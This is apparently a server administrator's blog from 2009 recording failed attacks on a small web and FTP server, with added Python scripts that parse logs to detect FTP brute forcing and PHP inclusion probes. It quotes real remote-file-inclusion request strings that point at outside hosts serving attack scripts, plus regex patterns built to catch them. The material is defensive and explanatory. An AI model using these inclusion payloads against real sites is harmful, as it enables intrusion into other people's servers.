21-Aug-2009

Korean visitors
Checking yesterday’s system load this morning, I saw there had been a spike in buffered IO at about 22:30. I checked the webserver access log and found just one address, 203.236.100.30, that fired off requests, hoping one would pass it on to another machine to break in. All requests contain the string:

/?_SERVER[DOCUMENT_ROOT]=http://www.nglschool.co.kr/zfxid.txt?

This morning, even more similar attempts were made from address 211.206.123.177, which appeared at 5:30, keeping the system even busier for a while trying to run the script:

/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt??

Using WHOIS, it looks like both addresses are registered in Korea: the first one is registered to kornet.kr, the second one to broadnet.com.
There have been some more attempts, none of them as heavy as the second one mentioned: that one pushed the server to handle 300 requests per minute, a lot for a small system like this, while accessing the PHP and Wiki engines. Without a problem, though: all requests ended in a 403 error.
The next hurdle on PHP
As found yesterday, it seems to work: PHP_INFO shows what it should show. So it’s time to handle the real stuff: I downloaded the latest version of phpMyAdmin and had it access the database on Diana in its configuration. After some mapping issues, phpMyAdmin did start, but next issued an error “extension “Session” cannot be loaded; check your configuration”, though the file does exist and the webservers do have READ + EXECUTE access to all files – and to the directory path to them. So I thought, but some seemed to be missing the required ACL, so I added the lines. Next, phpMyAdmin complains that the MySQL extension couldn’t be loaded – and it is obvious I need just that one.

If that doesn’t work, there is no need to test WordPress…

25-Jul-2009

FTP attack
The FTP log increased in size yesterday – by about 350 KB, just from one address thinking this is a Windows box that might have been easy to crack – or crash:

%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 121.124.27.222 at 24-JUL-2009 14:55:16.70
%TCPIP-E-FTP_LOGFAL, remote interactive login failure Administrator
-TCPIP-I-FTP_NODE, client host name: 121.124.27.222
-LOGIN-F-NOSUCHUSER, no such user

and it continues with this username – 2282 times. According to the online system performance logs, it took about 30 minutes: elevated CPU activity and paging (mainly soft-paging) and a bit more direct and buffered IO. Nothing hazardous – it’s not a Windows box, though the person trying seems to think so.
I checked the address – and it’s Korean. The ISP it belongs to has been notified of this abuse attempt.
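
The count of 2282 and the 30-minute window above came from the logs by hand. As an added example (not part of this post, and not a tool from the OpenVMS TCP/IP Services kit), the Python script below groups a TCP/IP Services FTP log into messages (a “%” line starts one, “-” lines continue it), pulls the client address, username and LOGIN reason out of every FTP_LOGFAL message, and reports any client that hammers one username more than a threshold, together with the time span between its first and last session connection. The sample log is constructed to mirror the excerpt above; the addresses are documentation-range placeholders rather than the real one, and the threshold of three failures is an assumed value.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample in the format of the OpenVMS TCP/IP Services FTP log
# quoted in the post: a '%' line starts a message, '-' lines continue it.
# Addresses are documentation-range placeholders, not the ones from the post.
SAMPLE_FTP_LOG = """\
%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 192.0.2.10 at 24-JUL-2009 14:55:16.70
%TCPIP-E-FTP_LOGFAL, remote interactive login failure Administrator
-TCPIP-I-FTP_NODE, client host name: 192.0.2.10
-LOGIN-F-NOSUCHUSER, no such user
%TCPIP-E-FTP_LOGFAL, remote interactive login failure Administrator
-TCPIP-I-FTP_NODE, client host name: 192.0.2.10
-LOGIN-F-NOSUCHUSER, no such user
%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 192.0.2.10 at 24-JUL-2009 15:24:40.05
%TCPIP-E-FTP_LOGFAL, remote interactive login failure Administrator
-TCPIP-I-FTP_NODE, client host name: 192.0.2.10
-LOGIN-F-NOSUCHUSER, no such user
%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 198.51.100.7 at 24-JUL-2009 16:02:01.12
%TCPIP-E-FTP_LOGFAL, remote interactive login failure backup
-TCPIP-I-FTP_NODE, client host name: 198.51.100.7
-LOGIN-F-INVPWD, invalid password
"""

SESSION_RE = re.compile(
    r"^%TCPIP-I-FTP_SESCON, .* from (\S+) at (\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d+)$")
FAIL_RE = re.compile(r"^%TCPIP-E-FTP_LOGFAL, remote interactive login failure (\S+)$")
NODE_RE = re.compile(r"^-TCPIP-I-FTP_NODE, client host name: (\S+)$")
REASON_RE = re.compile(r"^-(LOGIN-F-\w+),")


def group_messages(text):
    """Split the log into messages: each '%' line plus its '-' continuation lines."""
    messages = []
    for line in text.splitlines():
        if line.startswith("%"):
            messages.append([line])
        elif line.startswith("-") and messages:
            messages[-1].append(line)
    return messages


def login_failures(text):
    """Return (client, username, reason) for every FTP_LOGFAL message."""
    failures = []
    for msg in group_messages(text):
        m = FAIL_RE.match(msg[0])
        if not m:
            continue
        client, reason = "?", "?"
        for cont in msg[1:]:
            n = NODE_RE.match(cont)
            if n:
                client = n.group(1)
            r = REASON_RE.match(cont)
            if r:
                reason = r.group(1)
        failures.append((client, m.group(1), reason))
    return failures


def session_window(text):
    """First and last session-connection time per client address."""
    window = {}
    for msg in group_messages(text):
        m = SESSION_RE.match(msg[0])
        if not m:
            continue
        when = datetime.strptime(m.group(2), "%d-%b-%Y %H:%M:%S.%f")
        first, last = window.get(m.group(1), (when, when))
        window[m.group(1)] = (min(first, when), max(last, when))
    return window


def brute_force_report(text, threshold=3):
    """Clients with >= threshold failures against one username, with count and active span in minutes."""
    counts = Counter((c, u) for c, u, _ in login_failures(text))
    window = session_window(text)
    report = {}
    for (client, user), n in counts.items():
        if n < threshold:
            continue
        first, last = window.get(client, (None, None))
        minutes = (last - first).total_seconds() / 60 if first else 0.0
        report[(client, user)] = {"failures": n, "minutes": round(minutes, 1)}
    return report


if __name__ == "__main__":
    for (client, user), info in brute_force_report(SAMPLE_FTP_LOG).items():
        print(f"{client} tried '{user}' {info['failures']} times over {info['minutes']} min")
```

The LOGIN reason is worth keeping in the output: NOSUCHUSER for “Administrator” says at once that the attacker is guessing at an account the box does not have, exactly the point made above, whereas a run of INVPWD against a name that does exist is a different matter.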

Main page to be updated
I also noticed that the main page hasn’t been updated after last boot, following the power outage. Shame on me – but it will be taken care of tomorrow.

And by the way: IssiNoho – the VAMP site – is back online again – though not yet on OpenVMS, but Iain is working on it. So I revived the link 🙂

10-Mar-2009

VMSWiki actions
In the last few days, several new “accounts” have been created in the wiki – bogus names and bogus email addresses. At least, they didn’t look like valid ones (though I won’t rule out that they could be valid). But now I get an email if an account has been created, and that lessens the need to scan the webserver access logfile for abuse of the wiki.
But still, access to the files I deleted earlier is still attempted – from several places worldwide, including search engines. So I added a rule that any access to “/vmswiki/AirTickets*” raises an error other than “ERROR 404 – The requested resource could not be found”. It now raises “ERROR 501 – The requested action is not implemented by this server”. Practically, this is what I did: by this mapping I removed the possible activity 😀
The number of attempts to access these pages has since dropped.
Nevertheless, I’ll keep a close eye on the web activity.

15-Jan-2009

New kid on the block?
Since last week, most rejected requests are the same sequence:

aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:14 +0100] "GET /nonexistenshit HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:15 +0100] "GET /mail/bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:16 +0100] "GET /bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:17 +0100] "GET /rc/bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:18 +0100] "GET /roundcube/bin/msgimport HTTP/1.1" 302 341
aaa.bbb.ccc.ddd - - [11/Jan/2009:21:37:19 +0100] "GET /webmail/bin/msgimport HTTP/1.1" 302 341

It seems a new script has become available. It won’t work here, and if I had this type of software, I would disable it immediately. Still to find out what package that may be, or whether it’s somewhat standard.
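
Both this sequence and the “/?_SERVER[DOCUMENT_ROOT]=http://…” requests from the 21-Aug entry are easy to pick out of the access log automatically. As an added example (my own code, not part of this blog and not a feature of the webserver running here), the Python script below parses Common Log Format lines like the ones above, decodes the request target (so %5B/%5D-encoded brackets are caught as well), tags requests that try to override $_SERVER[…] with a remote URL or that sweep the usual webmail locations for bin/msgimport, counts hits per client address and rule, and reports the busiest minute in the log, the figure the 300-requests-per-minute remark in August was about. The sample log lines are constructed: documentation-range addresses and an example.invalid host stand in for the real ones, and the rule names are my own labels.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote

# Common Log Format as used by the lines quoted in the posts:
# host ident user [timestamp] "METHOD target PROTOCOL" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Probe signatures derived from the two request shapes shown in the posts.
# The rule names are my own labels (assumed, not from any tool).
PROBE_RULES = [
    # query string trying to override PHP's $_SERVER[...] with a remote URL
    ("rfi-override", re.compile(r"_SERVER\[[^\]]*\]=https?://", re.IGNORECASE)),
    # the webmail location sweep (/mail/bin/msgimport, /roundcube/bin/msgimport, ...)
    ("msgimport-sweep", re.compile(r"/bin/msgimport$")),
]

# Constructed sample: documentation-range addresses and an example.invalid host
# stand in for the real ones; the request shapes follow the log excerpts in the posts.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [11/Jan/2009:21:37:14 +0100] "GET /nonexistenshit HTTP/1.1" 302 341
192.0.2.10 - - [11/Jan/2009:21:37:15 +0100] "GET /mail/bin/msgimport HTTP/1.1" 302 341
192.0.2.10 - - [11/Jan/2009:21:37:16 +0100] "GET /bin/msgimport HTTP/1.1" 302 341
192.0.2.10 - - [11/Jan/2009:21:37:17 +0100] "GET /roundcube/bin/msgimport HTTP/1.1" 302 341
198.51.100.7 - - [20/Aug/2009:22:30:01 +0200] "GET /?_SERVER[DOCUMENT_ROOT]=http://example.invalid/zfxid.txt? HTTP/1.1" 403 0
198.51.100.7 - - [20/Aug/2009:22:30:02 +0200] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://example.invalid/zfxid.txt? HTTP/1.1" 403 0
198.51.100.7 - - [20/Aug/2009:22:30:03 +0200] "GET /vmswiki/?_SERVER[DOCUMENT_ROOT]=http://example.invalid/zfxid.txt? HTTP/1.1" 403 0
203.0.113.5 - - [20/Aug/2009:22:31:10 +0200] "GET /index.html HTTP/1.1" 200 1532
"""


def parse_line(line):
    """Parse one CLF line into a dict, or return None for lines that do not fit the format."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def classify(target):
    """Name of the first probe rule the (percent-decoded) request target matches, else None."""
    decoded = unquote(target)  # catch %5B / %5D encoded brackets as well
    for name, pattern in PROBE_RULES:
        if pattern.search(decoded):
            return name
    return None


def scan(text):
    """Count probe hits per (client, rule) and find the busiest minute in the log."""
    probes = Counter()
    per_minute = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        per_minute[rec["when"].strftime("%Y-%m-%d %H:%M")] += 1
        rule = classify(rec["target"])
        if rule:
            probes[(rec["host"], rule)] += 1
    if per_minute:
        peak_minute, peak_rpm = max(per_minute.items(), key=lambda kv: kv[1])
    else:
        peak_minute, peak_rpm = None, 0
    return {"probes": dict(probes), "peak_minute": peak_minute, "peak_rpm": peak_rpm}


if __name__ == "__main__":
    result = scan(SAMPLE_ACCESS_LOG)
    for (host, rule), n in sorted(result["probes"].items()):
        print(f"{host:16} {rule:18} {n}")
    print("busiest minute:", result["peak_minute"], result["peak_rpm"], "req/min")
```

Because the rules run on the decoded target, a probe that hides the brackets behind percent-encoding is counted in the same bucket as the plain form, which is what you want when deciding whether one address is worth a complaint to its ISP. The status column is kept in each record so the same loop can confirm, as the August entry did, that every tagged request ended in a 403.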